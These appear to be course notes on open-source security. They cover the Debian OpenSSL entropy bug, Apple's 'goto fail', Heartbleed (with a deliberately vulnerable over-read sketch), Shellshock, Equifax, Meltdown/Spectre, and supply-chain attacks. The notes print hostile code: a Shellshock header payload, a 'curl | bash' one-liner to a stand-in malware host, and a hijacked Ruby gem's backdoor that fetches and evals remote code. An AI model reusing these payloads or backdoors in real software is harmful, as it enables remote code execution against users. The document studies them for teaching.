Open-Source Security
Is open source more secure because more people look at the code? Or less
secure, because bad guys can look at the code and find bugs?
This question has been debated for quite some time. For a while,
so-called "fuzzing" techniques (for generating random input) did work
better when the source was available: the user would examine the source
and generate input until all the edge cases were triggered. The goal was
to execute every part of the code.
But then that changed: fuzzing tools were developed that could exercise the code thoroughly given only the object code. At that point, having the source available was no longer a particular liability, and keeping it closed was no longer much protection: a large number of Windows exploits started to appear.
On the other hand, the truth is that not everybody looks at the
code. In most cases, not very many do.
TLS, for Transport Layer Security, is an encryption layer used above TCP (or, as DTLS, above UDP). It is what puts the 's' in https, for secure http.
Three issues
First, the software can have bugs. Perhaps this is more likely for Open
Source because of fewer development resources, though that is hard to say.
Second, repositories can be compromised. This, too, can happen with
commercial software, but Open Source does seem to be at least a little
more prone to this.
Finally, it is easy for users to fall behind on upgrading. If you're
installing an e-commerce package from Microsoft, then Microsoft will make
sure it gets updated. However, if you're building your own e-commerce
package from a dozen separate open-source projects, then it's your job to
update them all. It's easy to forget.
These issues completely ignore the question of how many users actually
look at the code in their open-source packages, or whether it's easier to
figure out vulns once you hear vaguely of a problem with a certain
project.
It remains true that Open Source projects are easier to trust. Even
software from Microsoft is often tracking you or selling you something.
Debian OpenSSL bug
At some point (probably 2006), Debian removed a couple lines from the
Debian copy of OpenSSL because the lines generated complaints from
code-analysis software. Here's the code as of today, from boinc.berkeley.edu/android-boinc/libssl/crypto/rand/md_rand.c;
the function is static void ssleay_rand_add(const
void *buf, int num, double add). The variable m is a pointer to a
certain structure. The call to MD_Update() itself is actually a macro:
#define MD_Update(a,b,c) EVP_DigestUpdate(a,b,c)
Here is part of the code:
for (i=0; i<num; i+=MD_DIGEST_LENGTH)
    {
    j=(num-i);
    j=(j > MD_DIGEST_LENGTH)?MD_DIGEST_LENGTH:j;

    MD_Init(&m);
    MD_Update(&m,local_md,MD_DIGEST_LENGTH);
    k=(st_idx+j)-STATE_SIZE;
    if (k > 0)
        {
        MD_Update(&m,&(state[st_idx]),j-k);
        MD_Update(&m,&(state[0]),k);
        }
    else
        MD_Update(&m,&(state[st_idx]),j);

    /* DO NOT REMOVE THE FOLLOWING CALL TO MD_Update()! */
    MD_Update(&m,buf,j);
    /* We know that line may cause programs such as
       purify and valgrind to complain about use of
       uninitialized data.  The problem is not, it's
       with the caller.  Removing that line will make
       sure you get really bad randomness and thereby
       other problems such as very insecure keys. */
    MD_Update(&m,(unsigned char *)&(md_c[0]),sizeof(md_c));
    MD_Final(&m,local_md);
    md_c[1]++;

    buf=(const char *)buf + j;

    for (k=0; k<j; k++)
        {
        /* Parallel threads may interfere with this,
         * but always each byte of the new state is
         * the XOR of some previous value of its
         * and local_md (itermediate values may be lost).
         * Alway using locking could hurt performance more
         * than necessary given that conflicts occur only
         * when the total seeding is longer than the random
         * state. */
        state[st_idx++]^=local_md[k];
        if (st_idx >= STATE_SIZE)
            st_idx=0;
        }
    }
The code-analysis software thought the repeated calls (this is inside a
loop) to MD_Update(&m,buf,j) made use of uninitialized data.
This may actually have been the case, in that perhaps some
entropy was indeed supposed to come from the uninitialized data. The code
does look odd, though, from a deterministic point of view.
Still, the point of the repeated calls to MD_Update() was to generate
additional randomness.
Commenting out the call to MD_Update(&m,buf,j) greatly reduced the total available entropy: afterwards, essentially the only entropy mixed in was the process ID, a number with at most 32,768 (2^15) possible values. This really breaks the random-number generator; every key generated on an affected system came from a small, enumerable set.
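To make the scale of the loss concrete, here is a minimal standalone sketch in C (emphatically not the OpenSSL code): if the only thing ever mixed into a pseudorandom generator is the process ID, there are at most about 32,768 possible output streams, and an attacker can simply enumerate them all. The srandom()/random() calls below are stand-ins for the crippled seeding; this kind of enumeration is essentially how the blacklists of weak Debian keys were generated.

/* sketch only: enumerate every possible "seed" when the seed is just a pid */
#include <stdio.h>
#include <stdlib.h>

#define PID_MAX 32768   /* the default Linux pid limit at the time */

int main(void) {
    /* An attacker's precomputation loop: one candidate "key" per possible pid. */
    for (long pid = 1; pid <= PID_MAX; pid++) {
        srandom((unsigned int)pid);      /* stand-in for the crippled seeding */
        long candidate_key = random();   /* first "key material" from this seed */
        if (pid <= 3 || pid == PID_MAX)  /* print a few samples, not all 32,768 */
            printf("pid %5ld -> candidate key %ld\n", pid, candidate_key);
    }
    return 0;
}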
Debian discovered and fixed the error in 2008.
Apple TLS bug
Here is the source code (Apple has open-sourced a lot of OS X, but not
the GUI parts of it):
static OSStatus
SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams,
                                 uint8_t *signature, UInt16 signatureLen)
{
    OSStatus err;
    ...

    if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
        goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
        goto fail;
        goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;
    ...
    err = sslRawVerify();
    ...

fail:
    SSLFreeBuffer(&signedHashes);
    SSLFreeBuffer(&hashCtx);
    return err;
}
Note the duplicated "goto fail", and the lack of enclosing {}. Despite what the indentation suggests, the second goto fail is always executed, so the function always jumps to fail before the final hash check and the call to sslRawVerify(). But at that point we most likely still have err==0 (none of the err != 0 checks actually succeeded), and so the server's key-exchange signature is treated as verified even when it is bogus. It's times like this that it is really handy to have the compiler doing dead-code detection. Fail.
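Here is a minimal standalone sketch of the same control-flow pattern (hypothetical names, not Apple's code), showing why the unbraced if plus the duplicated goto skips every later check and still returns err == 0. A warning such as clang's -Wunreachable-code can flag the dead check.

/* check_one() and check_two() stand in for the SSLHashSHA1 calls. */
#include <stdio.h>

static int check_one(void) { return 0; }
static int check_two(void) { return 0; }   /* never actually called below */

static int verify(void) {
    int err = 0;
    if ((err = check_one()) != 0)
        goto fail;
        goto fail;                 /* always executed, despite the indentation */
    if ((err = check_two()) != 0)  /* unreachable; a compiler can warn about this */
        goto fail;
fail:
    return err;                    /* still 0, so verification "succeeds" */
}

int main(void) {
    printf("verify() returned %d\n", verify());   /* prints 0 */
    return 0;
}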
Ok, nobody was looking at the Apple source here outside of Apple.
OpenSSL Heartbleed bug
As the Debian and Apple issues above show, anyone can introduce TLS bugs.
But the "heartbleed" bug was clearly related to the relatively modest
development resources available to the OpenSSL foundation.
Most servers used OpenSSL (the SSL in the name is historical; the library implements TLS). TLS contains a heartbeat
provision: the client sends occasional "heartbeat request" packets and the
server is supposed to echo them back, exactly as is. This keeps the
connection from timing out. That is, the client sends a (len,data)
pair, and the server is supposed to echo back that much data. Part of the
reason for echoing back data is so the client can figure out which request
triggered a given response. It might make the most sense for the client
request data to represent consecutive integers: "0", "1", ..., "10", "11",
"12", ....
The problem is that the client can lie: the client can send a request in
which len ≠ data.length. If
len < data.length,
this is harmless; just the first len
bytes of data get sent back.
But what happens if len >
data.length, and the server sends back len
bytes? In this case the server would try to send too much back. In a
sensible language, this would result in an array-bounds exception for
data. In C, however, the result is the grabbing of a random chunk of
memory beyond data. Suppose
a sneaky client sent, say, a 3-byte payload, but declared the
payload length (the value of len)
as, say, 1000 bytes. The server now sends back 997 bytes of general heap
memory, which may contain interesting content. Unpredictable, but
interesting.
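Before looking at the actual OpenSSL code, here is a minimal standalone sketch of the vulnerable pattern (hypothetical structure and names, not the OpenSSL code): the server copies however many bytes the client claimed to send, with no check against what was actually received. The cure, as in the real patch shown further below, is to compare the declared length against the size of the received record before copying.

/* sketch only: this program deliberately contains the over-read */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct heartbeat {
    unsigned short declared_len;   /* what the client *claims* the payload length is */
    char payload[3];               /* what the client actually sent */
};

int main(void) {
    struct heartbeat *req = malloc(sizeof *req);
    req->declared_len = 100;              /* the lie: the actual payload is 3 bytes */
    memcpy(req->payload, "hi!", 3);

    /* Vulnerable echo: copy declared_len bytes with no check against the
     * actual payload size.  The extra 97 bytes are whatever happens to lie
     * in memory after req->payload -- on a real server, other heap data. */
    char reply[256];
    memcpy(reply, req->payload, req->declared_len);

    fwrite(reply, 1, req->declared_len, stdout);   /* output includes leaked garbage */
    putchar('\n');
    free(req);
    return 0;
}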
Here is the original code, from tls1_process_heartbeat(SSL * s). The variable payload represents the declared length of the heartbeat payload, as read from the packet.
n2s(p, payload);    // pld: extract value of payload (the declared length)
pl = p;
...
if (hbtype == TLS1_HB_REQUEST)
    {
    unsigned char *buffer, *bp;
    int r;

    /* Allocate memory for the response, size is 1 bytes
     * message type, plus 2 bytes payload length, plus
     * payload, plus padding
     */
    buffer = OPENSSL_malloc(1 + 2 + payload + padding);
    bp = buffer;

    /* Enter response type, length and copy payload */
    *bp++ = TLS1_HB_RESPONSE;
    s2n(payload, bp);
    memcpy(bp, pl, payload);    // pld: copy payload bytes from pointer pl to pointer bp (= buffer, above) -- no length check!
    bp += payload;
    /* Random padding */
    RAND_pseudo_bytes(bp, padding);

    r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);

    if (r >= 0 && s->msg_callback)
        s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
            buffer, 3 + payload + padding,
            s, s->msg_callback_arg);

    OPENSSL_free(buffer);
    if (r < 0)
        return r;
    }
There is no check here that the value of payload, the declared
length of the payload, matches the actual length of the payload.
Here is the fix; the essential change is that the declared payload length is now validated against the length of the record actually received, before it is ever used:
/* Read type and payload length first */
if (1 + 2 + 16 > s->s3->rrec.length)
    return 0;       // pld: record too short to even hold the type byte, length field and minimum padding; silently discard
hbtype = *p++;
n2s(p, payload);    // pld: extract the declared payload length
if (1 + 2 + payload + 16 > s->s3->rrec.length)
    return 0;       // pld: declared length exceeds what was actually received; RFC 6520 section 4 says to silently discard
pl = p;

if (hbtype == TLS1_HB_REQUEST)
    {
    unsigned char *buffer, *bp;
    int r;

    /* Allocate memory for the response, size is 1 bytes
     * message type, plus 2 bytes payload length, plus
     * payload, plus padding
     */
    buffer = OPENSSL_malloc(1 + 2 + payload + padding);
    bp = buffer;

    /* Enter response type, length and copy payload */
    *bp++ = TLS1_HB_RESPONSE;
    s2n(payload, bp);
    memcpy(bp, pl, payload);    // pld: now safe; payload is known to fit within the received record
    bp += payload;
    /* Random padding */
    RAND_pseudo_bytes(bp, padding);

    r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);

    if (r >= 0 && s->msg_callback)
        s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
            buffer, 3 + payload + padding,
            s, s->msg_callback_arg);

    OPENSSL_free(buffer);
    if (r < 0)
        return r;
    }
Google reported the bug to the OpenSSL Foundation on April 1, 2014. It is
estimated that somewhere between 15 and 60% of sites using SSL were
affected.
The bug is now fixed. Nobody knows how much it was exploited.
The more interesting question might be why OpenSSL didn't get more attention before. There were people outside the OpenSSL Foundation looking at the code, but none of them noticed Heartbleed.
Ultimately, the problem was that OpenSSL was severely underfunded. The president of the OpenSSL foundation is (or was, in 2014; he has since left) Steve Marquess. In a blog
post after Heartbleed, he described himself as the fundraiser. The
OpenSSL foundation received $2,000/year in donations, and also did some
support consulting (the latter earned a lot more).
In the week after Heartbleed, the OpenSSL foundation received $9,000,
mostly in small donations from individuals. Not from the big corporate
users of OpenSSL.
The foundation has one paid employee, Stephen Henson, who has a PhD in graph theory. He is not paid a lot. Before Steve M created the OpenSSL foundation, Steve H's income was estimated at $20K/year. (The Heartbleed error was not his.)
Despite the low level of funding, though, in the eight (or more) years
before Heartbleed the OpenSSL Foundation was actively seeking
certification under the NIST Cryptographic
Module Validation Program. They understood completely that
cryptography needs outsider audits.
As of 2014, at least, the two Steves had never met face-to-face. Like
Steve M, Steve Henson moved on to other projects in 2017.
A month after the bug's announcement, the Linux Foundation announced that
it was setting up the Core
Infrastructure Initiative. They lined up backing from Google, IBM,
Facebook, Intel, Amazon and Microsoft. The first project on the agenda was
OpenSSL, and its struggle to gain certification from the US government.
In 2015 a formal audit of OpenSSL was funded, by the Open Crypto Audit
Project, opencryptoaudit.org.
That audit has now been completed; a 2016 status report is at icmconference.org/wp-content/uploads/G12b-White.pdf.
Here is a report of a later audit: ostif.org/the-ostif-and-quarkslab-audit-of-openssl-is-complete.
As of 2016, Black Duck reported that 10% of the applications they tested
were still vulnerable to Heartbleed, 1.5 years after the revelation (info.blackducksoftware.com/rs/872-OLS-526/images/OSSAReportFINAL.pdf).
See also the Buzzfeed article "The
internet is being protected by two guys named Steve".
More Open-Source Security Issues
Magento
Magento is an e-commerce platform
owned by Adobe. It is described as having an "open-source ecosystem". It is
available on github at github.com/magento.
I assume that is the "community edition"; there is also an "enterprise
edition".
A vulnerability was announced in April 2017 by DefenseCode LLC, six
months after it was reported privately to Magento. Magento did not respond
directly to DefenseCode. The vulnerability "could" lead to remote code
execution, though there are some additional steps to get that to work, and
it was not clear whether that actually happened in the wild. See www.defensecode.com/advisories/DC-2017-04-003_Magento_Arbitrary_File_Upload.pdf.
If a site adds a link to a product video stored remotely on Vimeo, the
software automatically requests a preview image. If the file requested is
not in fact an image file, Magento will log a warning message, but it will
still download the file. The idea is to trick Magento into downloading an
executable file, eg a .php file. An updated .htaccess
file also needs to be downloaded, but once the basic file-download idea is
working this is not difficult. Because of the way files are stored, the
.php file should begin with ".h", so the .htaccess file ends up in the
same directory.
Parts of the strategy also involve cross-site request forgeries (CSRF)
against someone with Magento management privileges at the target site.
Even low-level privileges are sufficient. There are numerous strategies
for trying to get someone to click on a suitable link; none of them are
sure bets.
Magento's failure to respond more aggressively to DefenseCode was
puzzling. This seems less likely in a "true" open-source project.
As of 2018, Magento was still running into security issues, often related to brute-force attacks on administrative passwords, which were frequently weak. Magento is an attractive target, as it is an e-commerce
front-end, and as a result a large number of credit-card transactions flow
through it.
Also in 2018, open-source security firm Black Duck was sold for roughly half a billion dollars.
Equifax
In August 2017 credit-reporting company Equifax discovered that personal
records on 140 million US people had been exfiltrated. The actual
vulnerability was in Apache Struts 2, which is a
framework for developing Java server-side web applications. It extends the
Java Servlet API. Struts has a history of serious vulnerabilities. The
vulnerability in question was CVE-2017-5638,
which allows for remote code execution.
Equifax was notified of the issue in March 2017. They looked, but could
not find a place on their site where Struts was being used! The
vulnerability went unpatched, even as it was being routinely exploited in
the wild.
Making sure tools and frameworks are updated is tedious work. Something like Struts can be buried in the archives of a project that was largely completed years ago. Ultimately, the attackers exploited the Struts flaw in a very old Equifax application known as the Automated Consumer Interview System.
In 2020, the US Department of Justice announced charges against four members of the Chinese military who are believed to have carried out the attack.
A more detailed analysis is at blog.0x7d0.dev/history/how-equifax-was-breached-in-2017.
That report attributes the breach to these factors:
- Insufficient knowledge of their legacy systems.
- Poor password storage practices.
- Lack of rigor in the patching process.
- Lack of network segmentation.
- Lack of Host-Based Intrusion Detection System (HIDS)
- Lack of alerting when security tools fail.
Equifax was negligent, in that they missed some things, but it is hard
to say they were glaringly negligent.
The Chinese probably use the information to identify people who are
under significant financial stress, and who may be vulnerable to
bribery.
Shellshock
This is the bash bug that allowed very easy remote code execution. It was discovered and fixed in 2014. The problem is that the act of importing an environment variable into a new bash process -- normally benign -- could be tricked into executing commands as well, if the variable's value began with a shell function definition.
The shell maintains the environment as a list of (name,value)
pairs. Specifically, we can assign an environment variable as follows:
FOO=here_is_my_string
echo $FOO
We can also define shell functions, eg with
FN() { echo hello;}
(the space before "echo" is significant). Prior to Shellshock, this function, once exported with export -f FN, would be stored in the environment as the pair (FN, "() { echo hello;}"). (You can list bash functions with typeset -F, and see the entire environment with env.)
The problem was that one could sneak a command in after the function definition, and an unpatched bash would execute that command at the moment it imported the environment variable. A normal export would never produce such a value, but an attacker who controls the string can. For example, the environment pair
FN='() { echo hello;}; echo "hello world!"'
contains a trailing command (the second echo) that is not actually part of the function. Because of a mistake in recognizing the end of the function body, older versions of bash treated the value as a function definition followed by an ordinary command, and ran the command. So whenever an environment containing this definition was passed to a new bash process, the 'echo "hello world!"' command would go along for the ride. The core problem occurs only with values that begin with '()'; normal shell-variable strings do not result in command execution. That is, an imported variable FN2='echo "hello world"' would not result in executing the command; nor would FN3="foo"; echo "hello world" (though, typed at a shell prompt, the FN3 line would echo "hello world" once, since it is simply an assignment followed by a separate command).
This is most of the problem. The other part is that web servers, and
quite a range of other software, routinely accept strings from clients
that they then turn into environment variables. For example, if the client
sends the following GET request to the server (from blog.cloudflare.com/inside-shellshock):
GET / HTTP/1.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,fr;q=0.6
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Host: cloudflare.com
then the server turns it into the following environment
settings (before executing the GET request):
HTTP_ACCEPT_ENCODING=gzip,deflate,sdch
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8,fr;q=0.6
HTTP_CACHE_CONTROL=no-cache
HTTP_PRAGMA=no-cache
HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
HTTP_HOST=cloudflare.com
The server does this so that a cgi script on the server will have access
to these values, through its environment. However, because of the bug,
setting environment variables can lead to code execution!
Now suppose the client instead sent the following as its User-Agent (there is no actual browser-identification string here at all):
User-Agent: () { :; }; /bin/eject
Then the command /bin/eject would be executed on the server whenever a pre-patch bash was started with that environment -- for example, to handle a CGI request. (As for the shell-function part, ":" is the bash null command; the legal function definition is just () { :; };.)
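Here is a minimal sketch, in C, of how a server-side step can trigger the bug (hypothetical code, and it only misbehaves with a pre-patch bash at /bin/bash): the attacker-controlled header value is copied into the environment, and the next bash invocation imports it.

/* sketch only: what a CGI-style server effectively does with the header */
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    /* Copy the malicious User-Agent value into the environment: */
    setenv("HTTP_USER_AGENT", "() { :; }; echo SHELLSHOCKED", 1);

    /* Any subsequently started bash imports that environment.  An unpatched
     * bash parses the value as a function definition and runs the trailing
     * command immediately, printing SHELLSHOCKED; a patched bash ignores it. */
    int status = system("/bin/bash -c 'true'");
    printf("bash exited with status %d\n", status);
    return 0;
}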
A consequence of the patch is that exported bash functions are no longer stored under their plain names in the environment; they now use specially encoded variable names (of the form BASH_FUNC_name%%), so an ordinary imported variable is never parsed as a function definition. (This wasn't strictly necessary to fix the bug, but it was probably a good idea.)
Meltdown and Spectre
The Meltdown and Spectre vulnerabilities are flaws in the CPUs themselves (Meltdown chiefly in Intel's, Spectre also in AMD's and ARM's); Intel open-sources nothing about its processors. But open-source operating systems still had to create patches.
The problem is that open-source patches had to be created while there was
still a news embargo on the details of the vulnerability, lest miscreants
get a leg up on exploiting them.
Meltdown and Spectre were discovered in the summer of 2017 by Jann Horn of Google, Werner Haas and Thomas Prescher of Cyberus Technology, and Daniel Gruss, Moritz Lipp, Stefan Mangard and Michael Schwarz of Graz University of Technology. The discoverers informed Intel, and all agreed to announce the flaw only once there was a fix in place.
In November 2017, Alex Ionescu noticed an upgrade to Windows 10 that made
the CPU run slower, with no obvious benefit. He suspected this was a
vulnerability patch.
On Wednesday January 3, 2018, there were new commits to the Linux kernel.
Observers quickly noticed that the commits didn't seem to make sense, from
a performance perspective. Rampant speculation that they were related to a
hardware vulnerability led to the announcement of Spectre and Meltdown on
that date. The scheduled release/announcement date was to be January 9,
Microsoft's "Patch Tuesday".
Still, the Linux community by and large did abide by the embargo rules.
This is complicated, because it means not using the public
discussion system that has been put in place. It also means not
releasing important security fixes until the embargo is ended.
The head of OpenBSD, Theo de Raadt, was extremely vexed, as OpenBSD was not given advance warning:
Only Tier-1 companies received advance
information, and that is not responsible disclosure – it is selective
disclosure.... Everyone below Tier-1 has just gotten screwed.
De Raadt also argued that, while Spectre might be considered an
unforeseen bug, the issues behind Meltdown were long understood to at
least some degree. Intel decided to go ahead with their
speculative-execution design anyway, in order to beat the competition.
OpenBSD did announce a fix before the end of the embargo for the Wi-Fi KRACK vulnerability of October 2017. The theory at the time was that OpenBSD would therefore not be given advance warning of the next vulnerability. But other smaller OS vendors (eg Joyent, makers of SmartOS) also were not told about Meltdown/Spectre in advance.
Still, there is a real problem: to abide by embargo rules means
sitting on a fix, knowing your users might be being attacked. It
means your source is, until the embargo ends, no longer "open".
Windows Security
Windows systems are quite hard to secure, partly because there are so
many files that are not well-understood within the security community, and
partly because of the registry.
Licensing rules don't help. If you want to verify the SHA-3 checksum of
every file, for example, you pretty much have to boot off a clean
bootfile. Otherwise, malware that has made it into the kernel can make it
seem that all files are unchanged. However, in Windows, a separate boot
device technically requires a separate license. And in practice making a
bootable Windows USB drive is not easy, without paying for a separate
license.
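As a concrete illustration of the file-verification step (nothing Windows-specific here), the following small sketch computes the SHA3-256 digest of a file using OpenSSL's EVP interface (assumes OpenSSL 1.1.1 or later; link with -lcrypto). The point in the text stands: the output is only trustworthy if the program, the operating system, and the reference hash list all come from a separately booted, known-clean medium.

/* sketch only: print the SHA3-256 digest of the file named on the command line */
#include <stdio.h>
#include <openssl/evp.h>

static int hash_file(const char *path, unsigned char out[EVP_MAX_MD_SIZE], unsigned int *outlen) {
    FILE *f = fopen(path, "rb");
    if (!f) return -1;
    EVP_MD_CTX *ctx = EVP_MD_CTX_new();
    EVP_DigestInit_ex(ctx, EVP_sha3_256(), NULL);
    unsigned char buf[4096];
    size_t n;
    while ((n = fread(buf, 1, sizeof buf, f)) > 0)
        EVP_DigestUpdate(ctx, buf, n);
    EVP_DigestFinal_ex(ctx, out, outlen);
    EVP_MD_CTX_free(ctx);
    fclose(f);
    return 0;
}

int main(int argc, char **argv) {
    unsigned char md[EVP_MAX_MD_SIZE];
    unsigned int len;
    if (argc < 2 || hash_file(argv[1], md, &len) != 0) return 1;
    for (unsigned int i = 0; i < len; i++) printf("%02x", md[i]);
    printf("  %s\n", argv[1]);
    return 0;
}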
Cryptography Software
It is certainly reasonable to think of commercial software as reliable.
After all, one can read the reviews, and a company couldn't stay in
business if it didn't keep its users happy. If the software doesn't work
properly, won't users know?
If the software is a word processor, and it keeps crashing, or failing to
format text properly, the failure is obvious. If the software does complex
engineering calculations, that's harder to detect, but usually users do at
least a little testing of their own.
But if closed-source software does encryption, it is almost impossible to verify that it was done correctly. Just what random-number algorithm was used? Was the AES encryption done properly? (If it was not, the problem becomes very clear if the software sends encrypted content to an independent decryption program, but this is often not the case. Often the same program is used to encrypt files and then later to decrypt them, in which case an algorithm with a security flaw is almost undetectable.) Was the encryption done first, followed by the authentication hash (HMAC), or was it the other way around? Doing it the first way -- encrypt-then-MAC -- is much safer, as the HMAC is then computed over the ciphertext and so provides no information about whether brute-force decryption is on the right track.
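For concreteness, here is a minimal sketch of the encrypt-then-MAC ordering using OpenSSL's EVP and HMAC interfaces (link with -lcrypto). The keys and IV are hard-coded placeholders; a real design derives separate encryption and MAC keys and uses a fresh IV per message. The point is simply that the HMAC is computed over the ciphertext, so the tag leaks nothing about the plaintext.

/* sketch only: encrypt first, then MAC the ciphertext */
#include <stdio.h>
#include <openssl/evp.h>
#include <openssl/hmac.h>

int main(void) {
    unsigned char enc_key[32] = {1};   /* placeholder key material */
    unsigned char mac_key[32] = {2};   /* separate MAC key */
    unsigned char iv[16]      = {3};   /* placeholder IV */
    unsigned char plaintext[] = "attack at dawn";

    unsigned char ciphertext[sizeof plaintext + 16];
    int ctlen = 0, fin = 0;

    /* Step 1: encrypt (AES-256-CTR, just as an example cipher). */
    EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
    EVP_EncryptInit_ex(ctx, EVP_aes_256_ctr(), NULL, enc_key, iv);
    EVP_EncryptUpdate(ctx, ciphertext, &ctlen, plaintext, sizeof plaintext);
    EVP_EncryptFinal_ex(ctx, ciphertext + ctlen, &fin);
    ctlen += fin;
    EVP_CIPHER_CTX_free(ctx);

    /* Step 2: MAC the *ciphertext* (encrypt-then-MAC).  The tag reveals
     * nothing about the plaintext, so it cannot be used to confirm guesses
     * during a brute-force decryption attempt. */
    unsigned char tag[EVP_MAX_MD_SIZE];
    unsigned int taglen = 0;
    HMAC(EVP_sha256(), mac_key, sizeof mac_key, ciphertext, ctlen, tag, &taglen);

    printf("ciphertext bytes: %d, tag bytes: %u\n", ctlen, taglen);
    return 0;
}

None of this ordering is visible to the user of a closed-source product, which is exactly the problem.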
For reasons like this, some commercial encryption software is audited.
But usually it is not. The bottom line is that commercial crypto is hard
to trust.
Sometimes open-source isn't audited either. But it's hard to find out.
And even with OpenSSL, people outside the OpenSSL foundation were looking
at the basics of encryption, to make sure it looked ok.
Software Trust
Whatever one can say about open-source reliability (which, in general, is
comparable to commercial-software reliability), open source wins the trust
issue hands down. Once upon a time, most software was trustworthy, in that
you could be reasonably sure the software was not spying on you. Those
days are gone. Most Android apps spy, to some degree or another, on the
user. Microsoft Office appears not to, but Windows 10 sends quite a bit of
information back to Microsoft (some of this can be disabled through
careful configuration).
Spyware is almost unknown, however, in the open-source world. Ubuntu has a search feature that returns some information to Canonical, but that's reasonably up-front. Firefox often asks to send crash reports, but, again, that's open. The reasons open-source spyware is so rare are:
- users intensely dislike it
- it is usually easy to spot, in the source code, attempts to create new network connections that exfiltrate data back to the mothership
Ironically, "free" software that is not open-source is usually
spyware: "if you're not paying for the product, you are the
product". Most non-open-source browser add-ons, in particular, are
spyware. Many Android apps are spyware; flashlight apps are notorious.
Open-source trust is not always quite straightforward. Firefox, for
example, is the browser with the most privacy-protection features, hands
down. A version of Firefox is the basis for the Tor browser. That said,
many Firefox privacy features are disabled by default, because some
commercial sources of Firefox funding have had concerns.
SourceForge (and Gimp)
SourceForge is a popular alternative to GitHub for open-source projects.
GitHub makes money selling space for non-public projects (public projects
are free). SourceForge sold banner advertisements, and in 2013 started a
"bundleware" program in which a user who downloaded a program or source
tree would optionally receive a second download. The second download was
selected by default, though users could unselect it. SourceForge is often
used to distribute binaries, so this bundleware issue was not
easily avoided once the download started.
The problem was that the second downloaded package, a paid placement, often involved malware; at a minimum, spyware was common. Another common problem was advertisements that were allowed to contain a large, misleading DOWNLOAD button.
The Gimp project left SourceForge in 2013, but as of 2015 SourceForge was
still distributing Gimp binaries (as an "abandoned" project), and bundling
them with malware. This did not go over well with the Gimp team.
How can an open-source project protect itself against malicious
distribution? What happens when a project is completely abandoned? What
happens when a project simply moves elsewhere?
In 2016 the bundleware program was ended, as new owners took control.
Generally speaking, the actual open-source repositories weren't usually
tampered with, though the Gimp case might be an exception.
Tampered or Trojaned Repositories
These are also sometimes called software "supply chain" attacks.
In 2003, the main Linux kernel repository was still on BitKeeper, but the project maintained a separate mirror repository running CVS. One day a patch
appeared in the CVS image in the code for the wait4()
call:
+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+ retval = -EINVAL;
That last '=' on the first line is an assignment, not a comparison.
Setting uid to 0 gives the process root privileges. Inside a syscall, that
is legal.
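A tiny illustration of the trick (ordinary user-space C, not kernel code): an '=' inside a condition both assigns and tests the assigned value, so (uid = 0) quietly sets uid to 0 and makes the condition false. gcc and clang warn about a bare if (uid = 0) under -Wall/-Wparentheses, but an assignment wrapped in its own parentheses, as in the attacker's patch, does not trigger the warning.

#include <stdio.h>

int main(void) {
    int uid = 1000;
    if ((uid = 0))                      /* assignment, not comparison: uid becomes 0, branch not taken */
        printf("never printed\n");
    printf("uid is now %d\n", uid);     /* prints 0 -- i.e. "root" in the kernel setting */
    return 0;
}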
This patch never made it back to the main BitKeeper repo, and it was spotted almost immediately, as it was the only change on the CVS mirror that didn't have a corresponding link back to BitKeeper; but nobody knows how it got there. See lwn.net/Articles/57135.
There was a break-in at kernel.org in 2011. It is not certain that no kernel files were briefly modified, though the rigorous checksumming process would have made that difficult. Donald Austin was arrested for the breach, in Florida, in 2016.
In 2012, a SourceForge mirror site was hacked, and the phpMyAdmin package
was modified to contain malware.
In June 2018, hackers took over a Gentoo mirror account on github and
installed file-deleting malware. Gentoo suffered at least one earlier such
attack, in 2010.
In July 2018, three packages on the Arch User Repository (AUR) were infected with malware, including acroread (Adobe Acrobat Reader). Acroread isn't open-source, but it's trivial to slip a one-line attack into the package's installation script:
curl -s https://badware.ly/stuff.sh | bash &
The AUR is not the same as the Arch distribution itself, but
distinctions like this are sometimes hard to keep track of.
In an Aug 7, 2018 blog post, Eric Holmes described how he gained commit access to Homebrew using an exposed access token he found on the project's public build infrastructure. See medium.com/@vesirin/how-i-gained-commit-access-to-homebrew-in-30-minutes-2ae314df03ab. Homebrew is a package manager for macOS, though it also works well under Linux.
I'm harvesting credit card numbers and passwords from your site. Here's
how.
This was a 2018 warning post by David Gilbertson (david-gilbertson.medium.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5),
who was not actually doing this, but wanted to point out how
easy it was. Gilbertson discusses several standard countermeasures, and
describes how they are close to useless.
Webmin
There was also a 2018 attack on Webmin,
a system-administration tool, in which password_change.cgi was modified.
See www.webmin.com/exploit.html
for details. The attack affected the code on the build server, but
apparently not the Github repository. Still, the vulnerable code
was widely distributed. Most users, for example, installed the Debian or
RPM pre-compiled package.
Ruby strong_password gem
In June 2019 the Ruby strong_password
gem (Ruby's name for a library), version 0.0.7, was hijacked.
See withatwist.dev/strong-password-rubygem-hijacked.html
Here's the crucial code:
Thread.new {
  loop {
    _!{
      sleep rand * 3333;
      eval(
        Net::HTTP.get(
          URI('https://pastebin.com/raw/xa456PFt')
        )
      )
    }
  }
} if Rails.env[0] == "p"
This:
- starts a new thread
- after sleeping a random interval of up to 3333 seconds (just under an hour)
- retrieves code from pastebin.com
- executes it
- wrapped in an empty exception handler, so you won't see errors (pld:
I'm not sure about this, but maybe _!
does this)
- only if Ruby is running in production mode (making
it harder to observe via testing)
